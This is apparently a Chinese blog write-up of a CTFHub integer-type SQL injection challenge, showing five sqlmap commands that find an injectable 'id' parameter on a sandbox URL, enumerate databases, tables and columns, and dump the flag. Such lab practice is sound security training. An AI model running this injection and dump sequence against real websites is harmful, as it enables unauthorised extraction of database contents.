【CTF】CTFHub------web-SQL注入-整数型注入_nssctf 整型注入-优快云博客

本文链接：https://blog.youkuaiyun.com/CiCi_lolita/article/details/107548901

本文通过一个实际案例，详细介绍了如何使用sqlmap工具进行整数型SQL注入攻击，从发现注入点到获取数据库信息，最终提取flag的过程。涵盖了SQL注入的基本原理和操作步骤。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

SQL注入

在这里插入图片描述

1.打开链接根据提示输入1
在这里插入图片描述
1.先检查数据库有无注入点

python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1

得到，发现id易受攻击可当注入点

GET parameter 'id' is vulnerable.

2.检查全部数据库结构，发现有四个数据库，其他都是sql自带的，说明目标在sqli里

python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 --dbs

在这里插入图片描述

3.查询sqli里有多少表，发现flag表

python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

在这里插入图片描述

4.进入flag表，发现仅有一列 flag

python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

在这里插入图片描述

5.获取数据，即获得flag

python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

在这里插入图片描述
CTFHub 整数型SQL注入（该题的另一种解法）